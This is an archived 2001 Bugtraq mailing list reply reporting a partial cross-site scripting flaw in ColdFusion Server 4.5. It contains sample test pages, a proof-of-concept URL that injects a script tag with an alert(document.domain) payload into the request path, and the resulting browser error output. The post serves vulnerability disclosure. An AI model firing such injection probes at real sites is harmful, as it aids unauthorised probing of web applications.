Bugtraq mailing list archives

RE: Multiple Vendor Java Servlet Container Cross-Site Scripting V ulnerability

From: "Cook, Justin S. (Schmidt)" <JSCook () schmidt com>
Date: Tue, 3 Jul 2001 07:47:14 -0500

This same vulnerability seems to be partially evident for CFServer(at least
version 4.5).

Using the following code:

default.cfm
-----------
<html>
<head>
 <title>CFML Cross-site Scripting Vulnerability Testing</title>
 <script language="javascript" src="extra.js"></script>
</head>
</html>

extra.js
---------
/* does nothing */
function foo() {
        var bar="foo";
        return bar;
}

if you do a reqest in your browser for
http://domain/default.cfm/<script>alert(document.domain)

You can see that the JS is at least paritally interpreted because it shows
up in the IE errors. If viewed in netscape, you see that there is a syntax
error with the first tag(in this case <html>).

IE Error: 
Line: 4
Char: 1
Error: Syntax Error
Code: 0
URL: http://domain/default.cfm/<script>alert(document.domain) 

NS 4.7 Error: 
JavaScript Error:
http://domain/default.cfm/extra.js,
line 3:

syntax error. 

<html>
^

Quite odd results actually. It only seems to work when you call out for an
external javascript file. 

Justin Cook
Work: jscook () schmidt com
Home: jsc () themes org / jcook () k-lug org

Current thread:

RE: Multiple Vendor Java Servlet Container Cross-Site Scripting V ulnerability Cook, Justin S. (Schmidt) (Jul 03)